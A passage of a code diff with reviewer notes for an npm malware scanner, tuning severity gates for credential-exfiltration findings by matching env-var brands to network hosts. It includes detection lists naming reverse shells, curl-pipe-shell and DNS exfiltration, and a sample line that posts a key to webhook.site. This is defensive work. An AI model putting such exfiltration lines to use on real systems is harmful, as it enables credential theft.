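  quasis: [{ value: { cooked: 'https://cdn.example/' } }, { value: { cooked: '.mjs' } }] };
// import('https://example.test/' + x): legacy-HIGH node type stays HIGH
const concat = { type: 'BinaryExpression', operator: '+',
  left: { type: 'Literal', value: 'https://example.test/' },
  right: { type: 'Identifier', name: 'x' } };

const verdicts = [localTemplate, remoteTemplate, concat].map(classifyDynamicImport);
console.log(verdicts);
```

The third sample shows the "never escalates" property: a concatenation was HIGH under the legacy rule, so it stays HIGH even though it contains a URL literal.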
@@ -216,6 +216,11 @@ function handlePostWalk(ctx) {
216
216
  });
217
217
  }
218
218
 
219
+ // Per-file network-destination verdict (decoy-safe): true iff every literal host is
220
+ // local/reserved or a curated provider; any public-IP/suspicious/unknown host — or no host —
221
+ // ⇒ false. Reused by the detached/uncaught-exfil compounds below.
222
+ const destAllBenign = ctx._content ? networkDestinationsAllBenign(ctx._content) : false;
223
+
219
224
  // Credential regex harvesting: credential-matching regex + network call in same file
220
225
  // Real-world pattern: Transform/stream that scans data for tokens/passwords and exfiltrates
221
226
  if (ctx.hasCredentialRegex && ctx.hasNetworkCallInFile) {
@@ -328,7 +333,7 @@ function handlePostWalk(ctx) {
328
333
  // destination in the file is first-party/local/provider (e.g. an otel collector on
329
334
  // localhost, an SDK POST to its own API). A suspicious/unknown/public-IP host — or no
330
335
  // literal host at all — leaves it firing (conservative: confirmed-benign only).
331
- const destAllBenign = ctx._content ? networkDestinationsAllBenign(ctx._content) : false;
336
+ // (destAllBenign is computed once above, at the credential_regex_harvest emission site.)
332
337
  if (hasDetachedInFile && hasSensitiveEnvInFile && ctx.hasNetworkCallInFile && !destAllBenign) {
333
338
  ctx.threats.push({
334
339
  type: 'detached_credential_exfil',
@@ -1043,6 +1043,40 @@ function analyzeFile(content, filePath, basePath) {
1043
1043
  }
1044
1044
  }
1045
1045
 
1046
+ // Gate #1 (FPR 2026-06-15, Step 0 adjudication): the C7 block above only covers pure
1047
+ // env_read sources; the dominant live FP cluster (~25% of band 20-49, 0 TP) is a
1048
+ // credential_env_read API key (OPENAI_API_KEY, YINGDAO_ACCESS_TOKEN, …) flowing to the
1049
+ // package's OWN first-party API or a curated provider. The decoy-safe discriminant is
1050
+ // brand coherence (env-var brand ↔ host label) + curated providers + local hosts, applied
1051
+ // to EVERY destination. Limited to env-like sources (a credential_read FILE, command_output,
1052
+ // or fingerprint_read source stays CRITICAL — those are genuinely higher-risk). Downgrade to
1053
+ // MEDIUM so the signal survives; residual = compromised first-party domain, the same risk the
1054
+ // mature/MT-1 cap already accepts. Flag-gated (default off) for measure-then-flip rollout.
1055
+ if (process.env.MUADDIB_DF_SDK_GATE === '1' &&
1056
+ (severity === 'CRITICAL' || severity === 'HIGH')) {
1057
+ const envLike = sources.filter(s => s.type === 'env_read' || s.type === 'credential_env_read');
1058
+ const onlyEnvLike = sources.every(s =>
1059
+ s.type === 'env_read' || s.type === 'credential_env_read' || s.type === 'telemetry_read');
1060
+ if (envLike.length > 0 && onlyEnvLike) {
1061
+ try {
1062
+ const { extractBrandFromEnvVar, networkDestinationsAllBenignOrBrand } = require('../sdk-destination.js');
1063
+ const gateContent = fs.readFileSync(filePath, 'utf8');
1064
+ const brands = envLike.map(s => {
1065
+ const envVar = s.name
1066
+ .replace(/^process\.env\./, '')
1067
+ .replace(/^process\.env\[['"]/, '')
1068
+ .replace(/['"]\]$/, '');
1069
+ return extractBrandFromEnvVar(envVar);
1070
+ }).filter(Boolean);
1071
+ if (networkDestinationsAllBenignOrBrand(gateContent, brands)) {
1072
+ severity = 'MEDIUM';
1073
+ }
1074
+ } catch {
1075
+ // sdk-destination / file read unavailable — keep severity
1076
+ }
1077
+ }
1078
+ }
1079
+
1046
1080
  const sourceDesc = hasCommandOutput ? 'command output' : 'credentials read';
1047
1081
  threats.push({
1048
1082
  type: 'suspicious_dataflow',
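Review note: the brand-coherence idea (env-var brand matched against host labels, applied to every destination) can be illustrated with a toy version. The real `extractBrandFromEnvVar` and `networkDestinationsAllBenignOrBrand` live in `sdk-destination.js` and are not shown in this diff, so everything below is an assumption about the general shape: `brandFromEnvVar`, `hostsInText`, `allDestinationsMatchBrand`, the generic-token list, and the localhost allowance are hypothetical stand-ins.

```javascript
// Hypothetical stand-ins; not the package's implementation.
const GENERIC_TOKENS = new Set(['API', 'KEY', 'TOKEN', 'SECRET', 'ACCESS', 'AUTH']);

// Take the first non-generic segment of the env-var name as the brand.
function brandFromEnvVar(name) {
  const first = name.split('_').find((part) => part && !GENERIC_TOKENS.has(part.toUpperCase()));
  return first ? first.toLowerCase() : null;
}

// Extract literal http(s) hosts from source text.
function hostsInText(text) {
  const hosts = [];
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(text)) !== null) hosts.push(m[1].toLowerCase());
  return hosts;
}

// Every destination must be local or carry a brand label; a single unknown
// host (a decoy next to the real exfil endpoint) keeps the finding at full severity.
function allDestinationsMatchBrand(text, brands) {
  const hosts = hostsInText(text);
  if (hosts.length === 0) return false; // assumed: no literal host stays conservative
  return hosts.every((h) => h === 'localhost' ||
    brands.some((b) => h.split('.').includes(b)));
}

const brands = [brandFromEnvVar('OPENAI_API_KEY')];
const sdkFile = "fetch('https://api.openai.com/v1/chat', { headers })";
const decoyFile = sdkFile + "; fetch('https://webhook.site/abc', { body: key })";

const sdkSeverity = allDestinationsMatchBrand(sdkFile, brands) ? 'MEDIUM' : 'CRITICAL';
const decoySeverity = allDestinationsMatchBrand(decoyFile, brands) ? 'MEDIUM' : 'CRITICAL';
console.log(brands, sdkSeverity, decoySeverity);
```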
@@ -978,7 +978,7 @@ function isNetworkSinkDescriptor(sink) {
978
978
  * file references a suspicious/paste host, a public IP, or any unknown domain (so a real
979
979
  * exfil like ecto — webhook.site + direct-IP — keeps firing). The package stays visible
980
980
  * via its other (lower-severity) signals, the same way intent-graph skips SDK pairs.
981
- * Rationale + corpus: FPR-segment-A-diagnosis-2026-06-14.md.
981
+ * Rationale + corpus: FPR segment A workstream (2026-06).
982
982
  *
983
983
  * @param {Array} flows - assembled cross-file flows (main + callback + emitter)
984
984
  * @param {string} packagePath - package root, to resolve sink file content
package/src/scoring.js CHANGED
@@ -1051,6 +1051,25 @@ function _hasExfilSink(threats) {
1051
1051
  return threats.some(t => EXFIL_SINK_TYPES.has(t.type) && t.severity !== 'LOW');
1052
1052
  }
1053
1053
 
1054
+ // Sink-coupling (workstream 2026-06-15): the subset of EXFIL_SINK_TYPES that PROVES taint or
1055
+ // unambiguous structural malice — NOT mere host-reputation string presence. When one of these
1056
+ // co-occurs with credential_regex_harvest it stays HIGH (anti-FN floor: protects cross-file
1057
+ // read→exfil and the intent/detached/staged compounds). The complement (suspicious_domain,
1058
+ // direct_ip_exfil, ioc_string_match, ioc_match) is host-reputation-only.
1059
+ const PROVEN_EXFIL_SINK_TYPES = new Set([
1060
+ 'known_malicious_package', 'pypi_malicious_package', 'shai_hulud_marker',
1061
+ 'detached_credential_exfil', 'silent_stealth_process',
1062
+ 'curl_pipe_shell', 'curl_env_exfil', 'reverse_shell', 'dns_exfil', 'oast_callback',
1063
+ 'function_constructor_require', 'staged_remote_loader', 'staged_eval_decode',
1064
+ 'fetch_decrypt_exec', 'download_exec_binary', 'self_destruct_eval',
1065
+ 'newsletter_auto_follow', 'cross_file_dataflow', 'intent_credential_exfil',
1066
+ 'intent_command_exfil', 'sandbox_known_exfil_domain', 'sandbox_network_after_sensitive_read'
1067
+ ]);
1068
+ function _hasProvenExfilSink(threats) {
1069
+ if (!Array.isArray(threats)) return false;
1070
+ return threats.some(t => PROVEN_EXFIL_SINK_TYPES.has(t.type) && t.severity !== 'LOW');
1071
+ }
1072
+
1054
1073
  function applyFPReductions(threats, reachableFiles, packageName, packageDeps, reachableFunctions) {
1055
1074
  // Initialize reductions audit trail on each threat
1056
1075
  // Store original severity before any FP reductions, so compound
@@ -1196,7 +1215,7 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
1196
1215
  }
1197
1216
  }
1198
1217
 
1199
- // FPR sink-coupling gate (chantier 2026-06 — FPR-baseline-2026-06-14.md). credential_regex_harvest
1218
+ // FPR sink-coupling gate (FPR workstream 2026-06). credential_regex_harvest
1200
1219
  // is a weak signal alone: a credential-shaped regex co-located with a network call, with NO proof
1201
1220
  // the matched secret flows out and NO host-reputation check (ast.js:hasCredentialInsideRegex +
1202
1221
  // hasNetworkCallInFile). The blind FPR baseline measured 94.4% FP on it — it fires on nodemailer
@@ -1206,13 +1225,23 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
1206
1225
  // taint ...). When no such sink is present, downgrade HIGH/CRITICAL → LOW. Runs after the dilution
1207
1226
  // floor so the floor's restored instance is also gated (the floor protects real exfil; with no sink
1208
1227
  // there is nothing to protect). No GT sample relies on credential_regex_harvest (verified).
1209
- if (!_hasExfilSink(threats)) {
1210
- for (const t of threats) {
1211
- if (t.type === 'credential_regex_harvest' && (t.severity === 'HIGH' || t.severity === 'CRITICAL')) {
1212
- t.reductions.push({ rule: 'sink_coupling', from: t.severity, to: 'LOW' });
1213
- t.severity = 'LOW';
1214
- }
1228
+ // Sink-coupling for credential_regex_harvest (per-instance, two-way): a proven taint /
1229
+ // structural-malice sink keeps HIGH (anti-FN floor); no exfil sink at all ⇒ LOW.
1230
+ const _crhProvenSink = _hasProvenExfilSink(threats);
1231
+ const _crhAnySink = _hasExfilSink(threats);
1232
+ for (const t of threats) {
1233
+ if (t.type !== 'credential_regex_harvest') continue;
1234
+ if (t.severity !== 'HIGH' && t.severity !== 'CRITICAL') continue;
1235
+ // (1) anti-FN floor: a proven taint / structural-malice sink ⇒ keep HIGH (host/flag irrelevant).
1236
+ if (_crhProvenSink) continue;
1237
+ // (2) no exfil sink at all ⇒ LOW (legacy behavior, flag-independent).
1238
+ if (!_crhAnySink) {
1239
+ t.reductions.push({ rule: 'sink_coupling', from: t.severity, to: 'LOW' });
1240
+ t.severity = 'LOW';
1241
+ continue;
1215
1242
  }
1243
+ // (3) only host-reputation sink(s) co-occur ⇒ keep HIGH (fall-through). A host-coupling
1244
+ // downgrade here (gate #3, MUADDIB_CRH_HOST_GATE) was measured inert and removed 2026-06-15.
1216
1245
  }
1217
1246
 
1218
1247
  for (const t of threats) {
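Reviewer note: the three branches of the new sink-coupling gate in the hunk above can be summarised with a small standalone sketch. It is not the code from `scoring.js`: the two sets below are hypothetical, shortened stand-ins for `EXFIL_SINK_TYPES` and `PROVEN_EXFIL_SINK_TYPES`, and `gateCredentialRegexHarvest` is an illustrative name that returns the resulting severities instead of mutating the threats or recording `reductions`.

```javascript
// Hypothetical, shortened stand-ins for the real sets in scoring.js.
const EXFIL_SINKS = new Set(['suspicious_domain', 'direct_ip_exfil', 'reverse_shell', 'dns_exfil']);
const PROVEN_SINKS = new Set(['reverse_shell', 'dns_exfil']);

// A sink only counts when it is itself above LOW, as in the diff.
const isActive = (set) => (t) => set.has(t.type) && t.severity !== 'LOW';

// Returns the severity each credential_regex_harvest finding would end up with.
function gateCredentialRegexHarvest(threats) {
  const provenSink = threats.some(isActive(PROVEN_SINKS));
  const anySink = threats.some(isActive(EXFIL_SINKS));
  return threats
    .filter((t) => t.type === 'credential_regex_harvest')
    .map((t) => {
      const elevated = t.severity === 'HIGH' || t.severity === 'CRITICAL';
      if (!elevated) return t.severity; // not HIGH/CRITICAL: the gate skips it
      if (provenSink) return t.severity; // (1) proven sink present: keep
      if (!anySink) return 'LOW'; // (2) no exfil sink at all: downgrade
      return t.severity; // (3) host-reputation sink only: keep
    });
}

const crh = { type: 'credential_regex_harvest', severity: 'HIGH' };
const noSink = gateCredentialRegexHarvest([crh]);
const hostOnly = gateCredentialRegexHarvest([crh, { type: 'suspicious_domain', severity: 'MEDIUM' }]);
const proven = gateCredentialRegexHarvest([crh, { type: 'reverse_shell', severity: 'CRITICAL' }]);
console.log(noSink, hostOnly, proven);
```

In this sketch only the no-sink case is downgraded; branches (1) and (3) both leave the severity unchanged, which matches the comment in the diff stating that the host-coupling downgrade was removed.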
@@ -88,7 +88,7 @@ function extractDomain(url) {
88
88
  // Capture only valid hostname characters so a path-less URL immediately followed by
89
89
  // a quote/paren (e.g. fetch('https://api.openai.com')) does not absorb the trailing
90
90
  // ')" into the host. Stops at /, :, ?, #, quotes, parens, etc.
91
- const match = url.match(/^https?:\/\/([a-zA-Z0-9.\-]+)/i);
91
+ const match = url.match(/^https?:\/\/([a-zA-Z0-9.-]+)/i);
92
92
  return match ? match[1].toLowerCase() : null;
93
93
  } catch {
94
94
  return null;
@@ -308,6 +308,45 @@ function networkDestinationsAllBenign(fileContent) {
308
308
  return true;
309
309
  }
310
310
 
311
+ /**
312
+ * Gate #1 variant of networkDestinationsAllBenign: a host ALSO passes if one of its labels
313
+ * matches a credential env-var BRAND (e.g. YINGDAO_ACCESS_TOKEN → api.yingdao.com). This covers
314
+ * the dominant credential→own-API FP cluster (Step 0 2026-06-15: ~25% of band 20-49, 0 TP) that
315
+ * networkDestinationsAllBenign rejects because a package's own domain is not a curated provider.
316
+ * Decoy-safe by construction: EVERY host must be local/reserved OR a curated provider OR
317
+ * brand-coherent; any unknown / public-IP / suspicious-tunnel host ⇒ false. No hosts ⇒ false.
318
+ * Brand coherence is not attacker-spoofable for the credential-theft case: stealing a VICTIM's
319
+ * OTHER-service key (OPENAI_API_KEY) and sending it to attacker.com yields brand "openai" vs label
320
+ * "attacker" ⇒ mismatch ⇒ keeps firing.
321
+ *
322
+ * @param {string} fileContent - source of the file containing the network sink
323
+ * @param {string[]} brands - brand tokens extracted from the credential env-var names
324
+ * @returns {boolean}
325
+ */
326
+ function networkDestinationsAllBenignOrBrand(fileContent, brands) {
327
+ const hosts = extractHostsFromContent(fileContent);
328
+ if (hosts.length === 0) return false;
329
+ // RFC 2606 / 6761 documentation & test placeholders (example.com/.net/.org, *.test, *.invalid)
330
+ // are NOT real SDK destinations — no benign SDK ships a live credential flow to example.com.
331
+ // A credential→placeholder flow is either a synthetic exfil sample or an evasion stand-in, so it
332
+ // must keep firing (it is deliberately NOT in the local-IPC benign class, unlike loopback/RFC1918).
333
+ const DOC_DOMAIN_RE = /(^|\.)example\.(?:com|net|org)$|\.(?:test|example|invalid)$/i;
334
+ const brandSet = (brands || [])
335
+ .map(b => String(b || '').toLowerCase())
336
+ .filter(b => b.length >= 3);
337
+ for (const h of hosts) {
338
+ if (SUSPICIOUS_DOMAIN_PATTERNS.test(h)) return false;
339
+ if (isPublicIpHost(h)) return false;
340
+ if (DOC_DOMAIN_RE.test(h)) return false;
341
+ if (isLocalOrReservedHost(h)) continue;
342
+ if (PROVIDER_DOMAIN_SUFFIXES.some(s => domainMatchesSuffix(h, [s]))) continue;
343
+ const labels = String(h).toLowerCase().split('.');
344
+ if (brandSet.length && labels.some(l => brandSet.includes(l))) continue;
345
+ return false; // unknown / unrecognised destination → keep firing
346
+ }
347
+ return true;
348
+ }
349
+
311
350
  module.exports = {
312
351
  SDK_ENV_DOMAIN_MAP,
313
352
  ENV_NOISE_TOKENS,
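Reviewer note: the brand-coherence test inside `networkDestinationsAllBenignOrBrand` can be tried in isolation with the sketch below. `hostMatchesBrand` is a hypothetical helper, not an export of the package; it reproduces only the label comparison and the minimum brand length of 3 from the hunk above, and omits the suspicious-domain, public-IP, documentation-domain, local/reserved, and curated-provider checks that the real function runs first.

```javascript
// Hypothetical helper isolating the brand/label comparison from the diff.
function hostMatchesBrand(host, brands) {
  const brandSet = (brands || [])
    .map((b) => String(b || '').toLowerCase())
    .filter((b) => b.length >= 3); // very short tokens are ignored
  const labels = String(host).toLowerCase().split('.');
  // A host is brand-coherent only when one whole DNS label equals a brand token.
  return brandSet.length > 0 && labels.some((l) => brandSet.includes(l));
}

// A package sending its own YINGDAO_* credential to its own API.
const ownApi = hostMatchesBrand('api.yingdao.com', ['YINGDAO']);
// A stolen OPENAI_* key sent to an unrelated host.
const stolenKey = hostMatchesBrand('attacker.com', ['OPENAI']);
// A two-character brand token is filtered out before matching.
const shortBrand = hostMatchesBrand('ab.attacker.com', ['AB']);
// Matching is per whole label, so a brand embedded in a longer label does not count.
const embedded = hostMatchesBrand('yingdao-cdn.attacker.com', ['YINGDAO']);
console.log(ownApi, stolenKey, shortBrand, embedded);
```

Because the comparison is on whole labels, a host such as `yingdao.attacker.com` would still be treated as brand-coherent by this sketch; whether the surrounding checks in the real function cover that case is not visible in this hunk.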
@@ -320,6 +359,7 @@ module.exports = {
320
359
  extractDomain,
321
360
  domainMatchesSuffix,
322
361
  isSDKPattern,
362
+ networkDestinationsAllBenignOrBrand,
323
363
  stripPort,
324
364
  isLocalOrReservedHost,
325
365
  isPublicIpHost,